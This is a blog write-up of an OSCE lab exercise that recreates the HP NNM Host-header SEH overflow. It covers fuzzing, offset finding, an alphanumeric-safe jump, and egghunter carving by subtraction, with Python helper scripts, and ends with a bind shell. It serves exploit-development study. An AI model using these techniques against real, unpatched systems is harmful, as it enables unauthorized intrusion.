Purpl3 F0x Secur1ty

Security Research.

23 July 2019

OSCE Prep - HP NNM 0-Day Re-creation

by purpl3f0x



Holy mother of god. This module took me four days to complete, spending 3-4 hours per day after work. Problems first started during fuzzing, mostly just because I was mis-interpreting the fuzzer results and not understanding the subtle nuances of how to fuzz properly. After that, it became an almost routine SEH overflow, with some small bumps in the road. Then came carving the shellcode, which fell flat on its face after I painfully realised there were more bad characters than I originally thought. Finally, I spent almost 2 hours trying to get the final payload to work, only to find that changing payloads resulted in instant success. At least I learned some damn good troubleshooting methods, so it's not all bad, right? Oh well, let's jump into why this was so hard.



Part 1 - Fuzzy Fuzzer Fuzzes The Server



Part of the reason I'm blogging about a well-known exploit is because I did this differently from how it was done in the OSCE lab guide, and I started going my own way with the fuzzing.

Once again I have to thank mah boi h0mbre for pointing out awesome tools like Boo-Gen that make things a lot more interesting and stream-lined (and easy).

Following the provided instructions, I used Burp Suite to capture an HTTP GET request to the target, saved that to a file, and piped it into Boo-Gen:

 

This is the default template that Boo-Gen produced from the original request. By default, nothing will be fuzzed. Instead of wasting time fuzzing everything, I just went with the knowledge provided in the course materials to know that I had to fuzz the "Host: " section of the target. However, given the format of this fuzzing template, I wasn't sure exactly where to begin, so it still ended up being a lengthy process as I struggled to figure out where to fuzz exactly.

So I started out fuzzing the blank space after host, but that didn't crash the server. So I adjusted where the fuzzing took place:

After I started fuzzing the IP address that comes after "Host:" and a blank space, I got a crash:

So now of course I work to replicate the crash. The fuzzer sent roughly 4000+ bytes by the time this crashed, so I rounded it off to 4000 and replicated the crash manually with a skeleton exploit:

Launching this crashes the server after a noticeable delay. For whatever reason, it takes 4-5 seconds after sending this to get a crash. After confirming that this will crash the server, I jump right into the usual next step of finding the offset.
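For reference, a skeleton along these lines can be sketched in Python. This is a minimal sketch and not the script from the post: the request path `/` and the helper name `build_request` are assumptions, and it only builds the request bytes. The one detail taken from the fuzzing results is the 4000-byte value placed after "Host: ".

```python
def build_request(host_value: bytes, path: bytes = b"/") -> bytes:
    """Build a raw HTTP GET request with a caller-supplied Host header value.

    The path is a placeholder (assumption); the post does not state it.
    """
    return (
        b"GET " + path + b" HTTP/1.1\r\n"
        b"Host: " + host_value + b"\r\n"
        b"\r\n"
    )


# 4000 bytes is the rounded-off size that crashed the server during fuzzing.
crash_request = build_request(b"A" * 4000)
print(len(crash_request))
```

Sending these bytes to the lab target over a plain TCP socket is left out here, since the target address and port are specific to the lab.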



Part 2 - Not a typical SEH overwrite



So as you may have noticed above, we're only overwriting SEH. In my last post, we had to overwrite both SEH and nSEH. But we only have one value here, which means that the placement of our JMP will be different, because there is no nSEH to overwrite. Before worrying about that, I go ahead with confirming the offset:

Relatively painless so far. More routine steps followed, such as confirming the offset by making sure I can accurately overwrite SEH:
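The usual way to find an offset like this is a cyclic pattern. The sketch below assumes that approach (the post does not say which tool was used) and mimics the familiar upper/lower/digit pattern layout. `pattern_create` and `pattern_offset` are illustrative names, not a real tool's API.

```python
import struct
from itertools import product
from string import ascii_lowercase, ascii_uppercase, digits


def pattern_create(length: int) -> bytes:
    """Return a cyclic pattern such as Aa0Aa1Aa2... truncated to `length` bytes."""
    triplets = []
    for upper, lower, digit in product(ascii_uppercase, ascii_lowercase, digits):
        if len(triplets) * 3 >= length:
            break
        triplets.append(upper + lower + digit)
    return "".join(triplets)[:length].encode("ascii")


def pattern_offset(pattern: bytes, seh_value: int) -> int:
    """Locate the dword seen in the SEH record (little-endian) inside the pattern."""
    return pattern.find(struct.pack("<I", seh_value))


pattern = pattern_create(4000)
# Pretend the debugger showed the 4 pattern bytes at offset 3000 in the handler.
observed = struct.unpack("<I", pattern[3000:3004])[0]
print(pattern_offset(pattern, observed))
```

Once the offset is known, replacing those 4 bytes with a recognisable marker and checking the SEH chain in the debugger confirms it.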

Here's where things got confusing and time wasting. I had to find a POP POP RET to use, and it had to of course work with our limited character set (more on that later). I had some weird issues that I believe were due to the stack being mis-aligned(?) When I found a POP POP RET by searching, and then scrolled the Disassembly window, the commands would change. The only explanation I have is that the stack wasn't aligned right, which made some opcodes appear out of order or something to that effect. For example:

I found this, which seemed like it would work, but as soon as I scrolled....

I dunno. If anyone can explain this weird crap to me hit me up on Twitter.

Eventually, I found a working, bad-character-friendly POP POP RET, and got moving. Now is when things got a little bit tricky. Remember that we're not overwriting any nSEH here, so our jump has to be put somewhere between our A buffer and the return address. Now's the part where things get interesting (and admittedly fun).



Part 3 - The woes of Alphanumeric restrictions



I went into this knowing full-well that the big challenge of this exploit was that it only allowed alphanumeric characters, which very strictly limits the opcodes that can be injected. Basically, alphanumeric opcodes range from \x01 to \x7F. Anything over \x7F injected into our exploit will have \x7F subtracted from it to turn it back into an alphanumeric character. So right off the bat, jumping has become more complicated. I can't simply throw in a \xEB\x06 and call it a day.
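A quick way to catch this kind of problem before sending anything is to scan the payload for bytes outside the allowed range. The sketch below assumes the allowed set is exactly \x01 to \x7F as described above; the server's additional bad characters are not listed in this post, so they would have to be removed from `ALLOWED` by hand. `find_bad_bytes` is an illustrative helper name.

```python
# Assumption: allowed bytes are 0x01..0x7F, per the description above.
ALLOWED = set(range(0x01, 0x80))


def find_bad_bytes(payload: bytes, allowed=ALLOWED):
    """Return (offset, byte) pairs for every byte the filter would mangle."""
    return [(i, b) for i, b in enumerate(payload) if b not in allowed]


short_jmp = b"\xEB\x06"  # the classic short jump, JMP SHORT +6
for offset, value in find_bad_bytes(short_jmp):
    print(f"offset {offset}: 0x{value:02X} is not allowed")
```

Running every stage of the exploit through a check like this is cheaper than discovering the filtering one crash at a time.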

So I start looking up the various methods for jumping with alpha restrictions, and I found a perfect 4-byte instruction that works well:

4C     ;DEC ESP
4C     ;DEC ESP
77 04 ;JA 04

So, to understand what was going on here, I looked up how JA works. Simply put, JA will only jump if the CF and ZF flags on the CPU are both 0. Each DEC ESP leaves a non-zero result, which clears ZF. DEC does not touch CF at all, so the jump relies on CF already being 0 at this point, which it was. With both flags at 0 the jump triggers and lands 4 bytes ahead, right over the SEH overwrite.

More info on how JA works can be found here.
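To make the flag logic concrete, here is a small model of the three instructions. It is a sketch under assumptions: the starting ESP is inferred from the value reported after the jump later in this post (1034E1E6 plus the two decrements), CF is assumed to be 0 on entry, and `JA_ADDR` is a made-up address used only to show how the rel8 operand is resolved.

```python
MASK = 0xFFFFFFFF


def dec32(value: int):
    """Model DEC on a 32-bit register. Returns (result, zf); CF is not modified by DEC."""
    result = (value - 1) & MASK
    zf = 1 if result == 0 else 0
    return result, zf


def ja_taken(cf: int, zf: int) -> bool:
    """JA (opcode 0x77) jumps only when CF == 0 and ZF == 0."""
    return cf == 0 and zf == 0


def short_jump_target(instr_addr: int, rel8: int) -> int:
    """A short jump is 2 bytes long; rel8 is signed and relative to the next instruction."""
    if rel8 >= 0x80:
        rel8 -= 0x100
    return (instr_addr + 2 + rel8) & MASK


cf = 0                     # assumption: CF is already clear when we get here
esp = 0x1034E1E8           # inferred: ESP before the two DEC ESP instructions
esp, zf = dec32(esp)       # 4C
esp, zf = dec32(esp)       # 4C
JA_ADDR = 0x1000           # hypothetical address of the 77 04 instruction
print(hex(esp), ja_taken(cf, zf), hex(short_jump_target(JA_ADDR, 0x04)))
```

The target works out to the JA address plus 6: two bytes for the instruction itself and four for the SEH overwrite that follows it.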

So at this point, the exploit looks like this:

Sending this to the server while running it in the debugger lands us right at the first C character, so now it's time for an egghunter! But we have to deal with a very tightly limited set of opcodes still, so we have to "carve out" the shellcode with very fancy maths. Get ready for some magic~



Part 3A - Making shellcode appear out of thin air~



So, before we can carve out our shellcode, we need to find a space to place the decoded shellcode and make sure it starts magically appearing in a place of our choosing. This is because we don't want to over-write the instructions that are carving out the shellcode and make everything crash. Using techniques picked up from here, I started doing the math to get ESP to where I wanted it.

After taking the short JA jump over the SEH overwrite, ESP is pointing to 1034E1E6. Scrolling down the stack, I see I have a lot of room to work with, so taking a blind but over-kill guess, I pick out address 1035FF70 as the target for my shellcode. Normally you'd calculate this very carefully if you had space limitations. But for me, all I really needed to remember is that my shellcode will be decoding in reverse, because I'm going to leverage how the stack works to make my shellcode magically appear, and remember, in x86 systems, the stack grows downward.

So, you might think that this should be as simple as adding to ESP, but we can't do that:

To add to ESP we have to use \x81\xC4, and \x81 is a bad character. So it seems almost like we can't pull this off. But we can. We can take advantage of the fact that we can underflow registers by subtracting huge numbers from them. It sounds very complex to do, but really it's not (at least not after I practiced and understood the VelloSec article).

I start by taking ESP where it is now, 1034E1E6, and subtracting where I want ESP to be, 1035FF70. The result is FFFEE276. So what am I supposed to do with this huge number? Well, following the VelloSec technique, I break the result down into individual bytes, and figure out what subtractions need to be made to make each byte equal 0, while avoiding bad characters. Seriously, just go read the VelloSec article linked above, it explains it way better than I can.

To make sense of this, let's summarize how this math works. Follow along with Windows calculator in Programmer mode to verify it for yourself, but make sure it's set to DWORD or it won't work.

1034E1E6 - 55556535 - 55556535 - 5554180C = 1035FF70.
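If you'd rather not click through a calculator, the same check can be done in a few lines of Python. This is just a verification sketch of the numbers above; masking with 0xFFFFFFFF plays the role of the calculator's DWORD setting, and `sub32` is an illustrative helper name.

```python
MASK = 0xFFFFFFFF  # keep every result inside 32 bits, like a real register


def sub32(value: int, *subtrahends: int) -> int:
    """Subtract each value in turn with 32-bit wraparound."""
    for s in subtrahends:
        value = (value - s) & MASK
    return value


esp_now = 0x1034E1E6
esp_target = 0x1035FF70
parts = (0x55556535, 0x55556535, 0x5554180C)

delta = (esp_now - esp_target) & MASK
print(hex(delta))                    # the "huge number" to split up
print(hex(sum(parts) & MASK))        # the three parts add up to the same value
print(hex(sub32(esp_now, *parts)))   # ESP after the three subtractions
```

Subtracting 0xFFFEE276 from a 32-bit register is the same as adding 0x11D8A, which is exactly the distance between the two addresses.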

So if we make these three subtractions, ESP will be set to where I want it. But I'm not actually going to directly subtract from ESP:

So, in the code above, three things are happening. First, I'm 0'ing out EAX (I'll explain this magic in a second). Then, I PUSH the value of ESP onto the stack, and then POP that value off the stack and into EAX. I then make my three subtractions (remembering to reverse the order of the bytes!) and finish by PUSHing EAX onto the stack and POPping that into ESP.
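Spelled out as bytes, that sequence can be sketched like this. The single-byte opcodes are the standard x86 encodings (25 = AND EAX, imm32; 2D = SUB EAX, imm32; 54 = PUSH ESP; 58 = POP EAX; 50 = PUSH EAX; 5C = POP ESP). The two AND constants are an assumption: they are the hex equivalents of the two binary values listed in this post, not copied from the original code. `imm32` and `ADJUST_ESP` are illustrative names.

```python
import struct


def imm32(value: int) -> bytes:
    """Encode a 32-bit immediate little-endian, i.e. with the byte order reversed."""
    return struct.pack("<I", value)


ADJUST_ESP = (
    b"\x25" + imm32(0x554E4D4A)    # AND EAX, 0x554E4D4A
    + b"\x25" + imm32(0x2A313235)  # AND EAX, 0x2A313235  (EAX is now 0)
    + b"\x54"                      # PUSH ESP
    + b"\x58"                      # POP EAX              (EAX = ESP)
    + b"\x2D" + imm32(0x55556535)  # SUB EAX, 0x55556535
    + b"\x2D" + imm32(0x55556535)  # SUB EAX, 0x55556535
    + b"\x2D" + imm32(0x5554180C)  # SUB EAX, 0x5554180C
    + b"\x50"                      # PUSH EAX
    + b"\x5C"                      # POP ESP              (ESP = adjusted value)
)

print(ADJUST_ESP.hex())
print(all(0x01 <= b <= 0x7F for b in ADJUST_ESP))
```

Every opcode and every immediate byte stays at or below \x7F, which is the whole reason for going through EAX instead of touching ESP directly.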

To explain what's going on with EAX, let's convert those two values into binary:

The binary equivalent of the two hex values above:

1010101010011100100110101001010

0101010001100010011001000110101

If you AND two numbers, you'll get the following predictable results:

So if you take the two numbers above, AND them, you'll get all 0's.
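This is easy to confirm with the two binary strings above. The sketch converts them back to hex and shows that no bit position is set in both, so ANDing any EAX value with one and then the other always leaves 0.

```python
first = int("1010101010011100100110101001010", 2)
second = int("0101010001100010011001000110101", 2)

print(hex(first), hex(second))
print(first & second)  # no overlapping bits

# Whatever EAX held before, two ANDs with these masks clear every bit.
for eax in (0x00000000, 0xFFFFFFFF, 0x1034E1E6, 0xDEADBEEF):
    assert (eax & first) & second == 0
```

Both constants are also made up entirely of bytes below \x80, which is what makes this a usable replacement for XOR EAX, EAX under the filter.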

Now, we're going to carve out the egghunter. The technique is the same as what was used above, except for one difference. We're going to take 4 bytes from the egghunter, subtract it from 00000000, and take that result and figure out the math. The key here is to do the last 4 bytes of the egghunter first, and work up to the first bytes.
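Why last-to-first? Because each PUSH moves ESP down by 4 before writing, so the final chunk has to land first for the bytes to read correctly in memory. The sketch below models just that part with a toy stack. The 8-byte `sample` is a stand-in and not the real egghunter: only its last 4 bytes (\x75\xE7\xFF\xE7) come from this post.

```python
import struct


def push_chunks(payload: bytes, esp: int, memory: bytearray) -> int:
    """Push the payload 4 bytes at a time, last chunk first. Returns the final ESP."""
    assert len(payload) % 4 == 0, "pad the payload to a multiple of 4 first"
    for end in range(len(payload), 0, -4):
        chunk = payload[end - 4:end]
        eax = struct.unpack("<I", chunk)[0]   # the value EAX must hold before PUSH EAX
        esp -= 4                              # PUSH decrements ESP first...
        memory[esp:esp + 4] = struct.pack("<I", eax)  # ...then stores little-endian
    return esp


sample = b"\x90\x90\x90\x90" + b"\x75\xE7\xFF\xE7"  # stand-in bytes + known last chunk
memory = bytearray(64)
esp = push_chunks(sample, 64, memory)
print(bytes(memory[esp:esp + len(sample)]).hex())
```

Note that the EAX value for the last chunk is 0xE7FFE775, the bytes in reverse order, which is the number the subtraction math has to produce.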

Before I show a snippet of my work, I must disclose that this part took me much longer than expected. Turns out this server has more than just alphanumeric restrictions. It has 6 additional bad characters, which I used many....many times. I had to redo a lot of calculations and redo a lot of shellcode, which was tedious, boring, frustrating work. So now, let's get to the carving. We have to reverse the byte order of the egghunter when doing the math. For example, to calculate the math we need to carve \x75\xE7\xFF\xE7, we'll do this:
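The by-hand math can also be automated. What follows is a minimal sketch, not the calculation from the original post: it greedily picks three values per byte position (tracking the carry) without any backtracking, and it assumes the allowed bytes are simply \x01 to \x7F. The six additional bad characters are not listed here, so remove them from `allowed` before trusting the output. `carve` is an illustrative name.

```python
MASK = 0xFFFFFFFF


def carve(target: int, allowed) -> list:
    """Find three 32-bit values, built only from allowed bytes, that sum to target mod 2**32."""
    allowed = sorted(set(allowed))
    ok = set(allowed)
    parts = [0, 0, 0]
    carry = 0
    for i in range(4):                      # least significant byte first
        want = (target >> (8 * i)) & 0xFF
        found = None
        for total in (want, want + 0x100, want + 0x200):
            need = total - carry            # what the three bytes must add up to
            for x in allowed:
                for y in allowed:
                    z = need - x - y
                    if z in ok:
                        found = (x, y, z, total >> 8)
                        break
                if found:
                    break
            if found:
                break
        if found is None:
            raise ValueError(f"no combination for byte {i}")
        for k in range(3):
            parts[k] |= found[k] << (8 * i)
        carry = found[3]
    return parts


chunk = 0xE7FFE775                          # \x75\xE7\xFF\xE7 with the bytes reversed
target = (0 - chunk) & MASK                 # what the three SUBs must add up to
parts = carve(target, range(0x01, 0x80))
print([hex(p) for p in parts])
print(hex((0 - sum(parts)) & MASK))         # EAX after zeroing and three SUBs
```

Starting from EAX = 0 and subtracting the three values wraps around to the chunk itself, which is then pushed onto the stack.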

To check my math as I went, I typed my commands right into the debugger by double-clicking on lines in the Disassembler pane, executed them one-by-one with F7, and observed the stack:

The commands in the screenshot don't match up to what I provided above it, because this was taken when I was still using bad characters. I was misled into believing the commands were okay since they ran in the debugger fine, but the filtering was occurring when my exploit sent the data to the server, so these didn't work later on. But, the point is that we successfully used slick maths to perform ~magic~ and make 4 bytes of the egghunter appear out of thin air. Before every operation we repeat the AND operations to 0 EAX, then do our 3 subtractions, PUSH the value in EAX onto the stack, and repeat until we're done:

The bytes in blue are the "decoded" bytes. We now have a functional egghunter that is looking for the egg "w00t". Time for the final step, which for me, was actually the HARDEST, and MOST FRUSTRATING PART. It took a lot of troubleshooting to work it out, and a lot of time wasted manually stepping thru the debugger until I found where to set key breakpoints to really see what was happening.



Part 4 - "No reverse shell for you"



Here is where things became cruel and unusual, and where the CTP lab manual and videos become as vague as possible. From the posts on the forums, a looooooooooot of people got very tripped up by this stage, so I guess I shouldn't beat myself up over it.

So, after lots of troubleshooting that wasn't documented because it was just hours of me hitting "F7" hundreds of times to step thru instructions, I came to this conclusion:

With absolutely no idea what to investigate, I took to the OffSec forums. Everyone there talks about "stack alignment" and making sure that ESP is divisible by 4. If it isn't, certain parameters vital to the shellcode get corrupted because the stack is shifted. After a while, I found the tell-tale signs that my stack was shifted:

At first I didn't think much of these oddities when I saw them, but from what I learned, seeing stuff like this means the stack is misaligned. But how did it get that way?
Oh right, to make our conditional JA jump work earlier, I decremented ESP twice.
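The divisible-by-4 rule is easy to check on any ESP value copied out of the debugger. As an illustration only, the sketch below uses the ESP values that appear earlier in this post; the ESP at the moment the shellcode actually ran is not recorded here. `misalignment` is an illustrative helper name.

```python
def misalignment(esp: int, boundary: int = 4) -> int:
    """Return how many bytes ESP sits past the last aligned boundary (0 means aligned)."""
    return esp % boundary


for label, esp in (
    ("before the two DEC ESP", 0x1034E1E8),
    ("after the two DEC ESP", 0x1034E1E6),
    ("chosen decode target", 0x1035FF70),
):
    print(f"{label}: {esp:08X} is off by {misalignment(esp)}")
```

Two single-byte decrements are exactly what it takes to knock an aligned ESP off by 2.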

Oddly enough, after being forced into redoing my shellcode carving math, the problem sort of fixed itself...:

Technically, ESP is now divisible by 4, but it's still shifted. I took care of this by prepending my shellcode with ADD ESP, 0x04, since my shellcode buffer isn't restricted by the alphanumeric filtering.

But even after fixing the stack, I still don't have a shell popping. Digging around on the forums and google got me nowhere. I was ready to give up. But then I started really reading the parameters being passed to ws2_32.connect() in the debugger and suddenly everything clicked.

Here we see, on the stack, the parameters being passed to ws2_32.connect(). This is telling me that the parameter "pSockAddr" is contained at the address 1035FDB0, which is directly below in the purple box. At first this meant nothing to me because 5C110002 doesn't appear to mean anything, backwards or forwards. Again, I was about to give up. But then I really paid attention to the next parameter, "AddrLen". It says 16, as in 16 bytes. Each line on the stack is only 4 bytes (8 hex digits), so that means 1035FDB4 also contains vital info. So, going off a gut feeling, I take the bytes, reverse them, and do some translations:

I knew it. I knew that looked like an IP address! But.........that's not my IP address in the labs. That's my VM's LAN address on my actual home network. How this ended up being sent to the debugger.........I have no god damn clue. My payload was generated using my lab IP. And since the VM obviously can't get to my LAN IP, it couldn't connect back to me.
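The same translation can be scripted. A sockaddr_in starts with a 2-byte address family, then a 2-byte port in network byte order, then the 4-byte IPv4 address, so the first two stack dwords hold everything of interest. In the sketch below, 5C110002 is the value from the stack above, while `EXAMPLE_ADDR_DWORD` is a made-up stand-in because the actual second dword is not reproduced in this post.

```python
import socket
import struct


def decode_sockaddr_in(dword0: int, dword1: int):
    """Decode the first 8 bytes of a sockaddr_in from two little-endian stack dwords."""
    raw = struct.pack("<II", dword0, dword1)       # bytes as they sit in memory
    family = struct.unpack("<H", raw[0:2])[0]      # sin_family, host byte order
    port = struct.unpack(">H", raw[2:4])[0]        # sin_port, network byte order
    address = socket.inet_ntoa(raw[4:8])           # sin_addr
    return family, port, address


EXAMPLE_ADDR_DWORD = 0x0A01A8C0  # hypothetical value, stands in for the dword at 1035FDB4
family, port, address = decode_sockaddr_in(0x5C110002, EXAMPLE_ADDR_DWORD)
print(family, port, address)
```

Read this way, 5C110002 is not noise after all: it is AF_INET (2) followed by port 4444, with the IP address in the very next dword.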

The solution was obnoxiously simple, and while I value the troubleshooting experience I gained in identifying these easy-to-miss bugs, I'm still mad that I didn't just try this sooner: Using a BIND shell instead of a reverse shell.

and........

Holy Jesus it worked.

I don't think I've ever been so happy to finally pop a shell. It was a hard-earned shell that came after hours of hair pulling and missing sleep.



Conclusion



Was this worth all the time and confusion...? I would say...yes. Because I don't doubt that the OSCE exam will throw some mind-bending curve-balls at me and it's better that I figure out how to troubleshoot my exploits while I have the luxury of time. This was the hardest module by far but probably the most beneficial. Perhaps one day before my lab time expires, I'll go back and try to get a working reverse shell, since others on the forums have said they can get it to work, but for now, I need to go do my other lab exercises while I still have lab time.



 

tags: Exploit Dev - Security Research